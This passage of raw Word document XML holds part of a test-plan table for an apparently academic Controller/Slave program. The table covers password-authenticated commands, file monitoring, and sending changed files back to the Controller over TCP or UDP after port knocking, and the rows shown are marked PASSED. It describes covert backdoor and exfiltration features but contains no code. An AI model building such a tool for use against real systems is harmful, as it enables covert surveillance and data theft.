            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>III</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Slave is listening on the same port as the Controller is sending on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">If the ports are not the same, we will not connect. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Slave is able to decrypt the password and authenticate the Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>If the password does not match, there will be no attempt to connect to the Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Once packet is sent, Slave will listen for another packet with password, commands, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Attempt to redo the previous tests again to see if the Slave’s responses are identical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Controller can read </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Console will explicitly output each parameter in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Slave will be monitoring a file if </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:strike/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:strike/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FILE_to_read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:strike/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> is specified </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Controller sets mode to “file”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Console will output the data regarding the file, read from Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>When there is a change in the file to be monitored, send the file back to the Controller using TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wireshark, Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Slave will initiate a port knocking sequence; upon success, Slave will take the file, package it in a packet, and send it back to the Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>When there is a change in the file to be monitored, send the file back to the Controller using UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wireshark, Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Slave will initiate a port knocking sequence; upon success, Slave will take the file, package it in a packet, and send it back to the Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Controller will be exporting changes of file if a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FILE_to_output</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  is specified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1550" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Results will be shown on Terminal Console</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197" w:rsidTr="00634A4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="795" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
            <w:tcMar>
